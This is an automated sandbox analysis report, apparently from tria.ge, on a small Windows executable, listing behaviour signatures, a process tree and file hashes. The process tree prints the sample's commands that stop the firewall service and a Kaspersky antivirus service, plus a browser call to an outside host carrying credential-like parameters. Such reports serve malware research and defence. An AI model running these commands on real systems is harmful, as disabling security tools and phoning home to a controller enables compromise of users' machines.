Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    140s
  • max time network
    123s
  • platform
    windows7_x64
  • resource
    win7-20240704-en
  • resource tags

    arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system
  • submitted
    13/08/2024, 16:31

General

  • Target

    93ddfc815409ca65a92acb859b774276_JaffaCakes118.exe

  • Size

    6KB

  • MD5

    93ddfc815409ca65a92acb859b774276

  • SHA1

    09e73c2a62da9a1978034ca09693a6aa4ed970d2

  • SHA256

    283a98bc6e05529d2f542b28e18320735544cb4581e5740e9adb98423172fb79

  • SHA512

    8c2d587ec407e4442f53e16e09421a9c348911ba9cb2211a308356f2c12517357b42692458b2085ee3f14c9d2cff9e1ed57c77d1dac2bec90c44b0d065fa4a1f

  • SSDEEP

    96:JFaBF7uqPF4kN42yNNR23MKN9H5UBEjdpCgBB:uF73F4a42e23MKNx/pCgBB

Score
6/10

Malware Config

Signatures

  • Network Share Discovery 1 TTPs

    Attempt to gather information on host network.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies Internet Explorer settings 1 TTPs 34 IoCs
  • Runs net.exe
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 32 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\93ddfc815409ca65a92acb859b774276_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\93ddfc815409ca65a92acb859b774276_JaffaCakes118.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1232
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c net stop sharedaccess
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2952
      • C:\Windows\SysWOW64\net.exe
        net stop sharedaccess
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2488
        • C:\Windows\SysWOW64\net1.exe
          C:\Windows\system32\net1 stop sharedaccess
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2232
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c net stop KAVStart
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2128
      • C:\Windows\SysWOW64\net.exe
        net stop KAVStart
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:1976
        • C:\Windows\SysWOW64\net1.exe
          C:\Windows\system32\net1 stop KAVStart
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2520
    • C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" http://houtai.8866.org/zhen2/user.asp?username=skype&password=ELZYPTFV&djwy=xiazailiang&op_type=add&submit=ok
      2⤵
      • Modifies Internet Explorer settings
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:2680
      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2680 CREDAT:275457 /prefetch:2
        3⤵
        • System Location Discovery: System Language Discovery
        • Modifies Internet Explorer settings
        • Suspicious use of SetWindowsHookEx
        PID:348

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    c4606354c44ce3a8e509d8d1243c49a9

    SHA1

    186e7a1277edd23d487f134873c42b9ef426f922

    SHA256

    cb73b63a34b5025fcad3a446f1da318625476914d9e5050beed1570d7875576b

    SHA512

    85d74be1ff0a8f958f6b1a0b65e83901d33839092b1516a674518f23005fd149699e6f992a525f162948a8e2cf6b9d46f8463b32680ea244d41b422eeee08e06

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    dbf6fc9d6eec9e8d40151703eacaf06d

    SHA1

    299b586a0c8257730998380fa1b73aafd1dca9e1

    SHA256

    8c16a40ebd54a442fed75749dfdb5285e5f66510902b60b6c75c30930fcad969

    SHA512

    a06428463e25e3666ba2f6833120e560cc9671eee520801395215cc3ecff53d898b57483d30422f71360473f040e63d3f71f937b6a0ebbd1c20d08277a996c15

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    7c3a4b6dc02ac5250305a8f6c6f36a90

    SHA1

    e356b62d568403b7527d602bb323415f9d251343

    SHA256

    fa6e187ecbbdf8a8e36cfa19ca1239b133a41d73035849e08c6ccdfd2465707f

    SHA512

    74544fff2a0ae7b1b656520d757404295a01acaa1b9fe7d3373b9422f413eee6b60f2af7bc97715502d383065d9141e88d3360442a49239b706a266f816b8b57

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    1ac5c7d63b82234ca7c885112290ae0e

    SHA1

    3dfbdedfcb1b25fc8f0e01155d200ced3d2fc137

    SHA256

    a58e3bd2afbbde3795b9db85904c3f8c6f702206b10a86104ed894d243a465b8

    SHA512

    0a712f9736757c84e802aa864522aa68b37ed4508245a4665384393b4076c42d3cc1982b21799809c65b8b92f0d37820ac66b2977eaf8a095d3ebc5777dded74

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    49826da3ffe16b1349641ff28cb1eae0

    SHA1

    f498ee734776fad531c1815b1b25756e8f0d9674

    SHA256

    6bdc3579d8bbedbcc87b3cceb69a717e5cb24463412fe0f62bc268b28d91250d

    SHA512

    e614e0250b641ef5166e3c02e24a0ab6bef7c247f5b4b7ec28c6834ef578fbfeec58c74cf042a8301cfc7a9f100fa331c428f87f88938c073daf7fe58ae7f1e1

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    ff2101ac7b6a7cecfd9659839c98f9b7

    SHA1

    4c42e39e8ae7cd6dcc9e4175fb8094360b6039a0

    SHA256

    c847b3be1307ed768a335497f08542badc089d61c756ce31775239938f51657c

    SHA512

    7ec758e95f4301cab85cc9c9ad99fbafd77151d465e0922dc4d20abc0c575c369bef83332944ce5b7dc69cbd1d4d4ed52e3989c5666f7a781556cb3192c57b4e

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    43bbe4d9261661c319d02b465aa312ea

    SHA1

    3705275a7c50c3b65ce83cb360bbb7fbc207f44d

    SHA256

    a9f791f3c47096f10a37bbfbcae6089bbe7daf63da7aa9cc69fd3b1a298dde1b

    SHA512

    1397fd56873bdf7b6baf17951f11628de2f9f20547a275c7c3609b1a32595307200cf44e97ca2c8d23ab8c151ac396eeb5c94a4fcf5c7ad472538ca2a80b5928

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    8850c4cb17834338701fcb42f29c86bf

    SHA1

    47e06f5b606f32234c8458871821d2070f230baf

    SHA256

    95f39d526384b759bc24eb1b424346be2021be73d3a63d022f6c7a0a505e9093

    SHA512

    c2be91646ebbbbf1cf088dee9af6539c497f690b46ef7020f8bc91a9d43d38a38b45a0ebf3c9162279221fd5802692faddf998524e59c9392dd6fae6d6fcd38d

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    67cc2e12e9d8b08678969dc12b375648

    SHA1

    7a25219023ec9f7a2cefedab9ee3b5d86e6aab51

    SHA256

    54365d291670d248b085a7f1c8b697c44cef631f3d74dbf453a1560b4bb2fd53

    SHA512

    9ec4a970620bfbbc2f2c76274b1e4ef8bc7d7ddf5e159782ed501567436f51264cdcdf89c80ca31b1d8c0c5424c9b677c71d768f0139feb8edbd76ead3b4fa2f

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    94ca9ef5921039cdcbe2ab75eafd1f2a

    SHA1

    ac0af7fe1020c408edd9099c6aeda965f5548ab9

    SHA256

    ae1be9a34483dcb5e42afc9ac2fa6d0afd552be1c784b67c73bc245a4eb51150

    SHA512

    3d6fa69a18627919295d1700c599acb8fd68013497dc50943252cf4e50616e60dfc57d213fac3238abd475cf075d854e50aaf4e201bdf72558a003f0d87303cd

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    a770d6b1eec32241b1edf013ef3e8c4c

    SHA1

    a50609bee95b9e7871e2a63089dbe52c7c2ec511

    SHA256

    85c08dc8c08442d6ae1fabe28eff22cabb0996c46af9a3498d2b28998b59dab9

    SHA512

    96d33c72da67275c9b1120e11c75344086e0aa3f067c19759353ec382451618ed7649f7864dbf698d8e9389808e99f0c0e87db00c2e35b09465d586d735bd92b

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    d1adcbe9a2fcdff6cbce31f7272063ac

    SHA1

    74b04b736948b0ea2b114513a8ce7c417ac6c459

    SHA256

    e748157bf8347e941d30443b1b891924610ed3dd424e3ce8ccda35f2e98cd804

    SHA512

    d270ecae858c37cc5e2e3b580479d6f037e9decd72aa99628de8f69d3734b540fda1853a4a6488fb6267143c76d8d98293bb5eca1f03d6ed02e697de3e2de5a6

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    b4d7a7321ba8791a1c85c6691bfed803

    SHA1

    85a791a6cb9b93f226a2b729d5f23fe45aecabf6

    SHA256

    c8c3d6780cc66929b797c0d5879a6f32892c5f055638763100c6a0efb60762a0

    SHA512

    fce9b5786ab78104b150e5af93f82f2f38826d8ba2e78dc700cb1b57cfb7d2106435440714ab1229118290c421e2c6b099a22566b07723b9bb93d488b9c8fdd5

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    3d731410da180ce3e6ff8b9fc0d416aa

    SHA1

    a5a909fa39cf32ab3cc2886d7b065d99d815a248

    SHA256

    95d93a5a61573dee420f8f1b00a715d5d3a5aaea5d5e5e9241861aaf533e0701

    SHA512

    e68379e8e4326d50f298f740ed5537afb504f1ef89ed727144b9770070d845352cb17605add087a0434b9ca69f4eb7cf793fa9437d94b312ca3045cc7df5e2ec

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    3c18d07b3f57f183d5b013acdb239778

    SHA1

    c3e8e6abb5d9926d20e97a68e14f1fe4e0afcb30

    SHA256

    76d985925b34cab4515e4309433f9b1101114f85e40819128ecf235d80dec3ae

    SHA512

    24f524157a427b298bde7692bbeab750dff3b314ce707a286b4b987985b8358d2467d9d6260f129f65568251a71f78c738e3467a3ee04647946745e2db8024f3

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    b94a8c6735b545cefb955c2fddc523db

    SHA1

    cf55a98bc1c84212402ffaedeb55c746a721d2b8

    SHA256

    debd48cbe78796523070dc5886f0808acbbf0428b296c06b7e6a0c86d0a2bb70

    SHA512

    363e6ca670e2065b4d16986fd00392717f878e0ae3e0febe5e9d51d74dcec8456021c813d804d190f976537a891e68c483afc0caedee8fa90f8ca3a657baf1b3

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    d369407f0136b9aef52862900b153a93

    SHA1

    31aafac60e0ee4b39efb23e3ce779a87d5416bd1

    SHA256

    f7dc35150c52f7b4eae5a848e82559b52b204d639734db185b333c4574022ed9

    SHA512

    1b857522389fca1bf5f8bb67c542a0176d00b1416a67aae0222b115c9ff6dc47490b028cf74e7e6faa6266e34a5aa6b5c9d042a6690c0f0697fb2471a7b3c3c0

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    ec6a759dd51d3982533756799885d7fd

    SHA1

    f1215d79564672a11ba1d66ed129a594dce3a281

    SHA256

    015ff7136fd8ad33b90607122b74ec1f7b8ad0aed3b7472804bd5cc0ad8fe733

    SHA512

    76725f08fd188574d4b881aec4b4e34ce8e38151e9d630d931c60362dd1c629f1c8ff8193f566f4e194280964cddae184977d1e63859503d004e76ad137c41fc

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    2a45a1a7e0fd443b248ed8405d7f14c7

    SHA1

    35ce6448670b6cb36a62fc399aba53d3ec417068

    SHA256

    207515ee7f5c39afcc7fda0a602f82dcbc83ca2cec5b6baa03019f2bdba0aee5

    SHA512

    7f2d78932014b519a9a19e8636966ec61dd673561f0a87a443ee1e026dbbbbb4eba5c9cd6fb498fdf61f0288c549374f7392ab31c7e037fd1e72750ab755a992

  • C:\Users\Admin\AppData\Local\Temp\Cab3787.tmp

    Filesize

    70KB

    MD5

    49aebf8cbd62d92ac215b2923fb1b9f5

    SHA1

    1723be06719828dda65ad804298d0431f6aff976

    SHA256

    b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

    SHA512

    bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

  • C:\Users\Admin\AppData\Local\Temp\Tar3836.tmp

    Filesize

    181KB

    MD5

    4ea6026cf93ec6338144661bf1202cd1

    SHA1

    a1dec9044f750ad887935a01430bf49322fbdcb7

    SHA256

    8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

    SHA512

    6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

  • memory/1232-4-0x0000000000400000-0x0000000000409000-memory.dmp

    Filesize

    36KB

  • memory/1232-6-0x0000000003AE0000-0x000000000459A000-memory.dmp

    Filesize

    10.7MB

  • memory/1232-11-0x0000000000400000-0x0000000000409000-memory.dmp

    Filesize

    36KB

  • memory/1232-2-0x0000000003010000-0x0000000003ACA000-memory.dmp

    Filesize

    10.7MB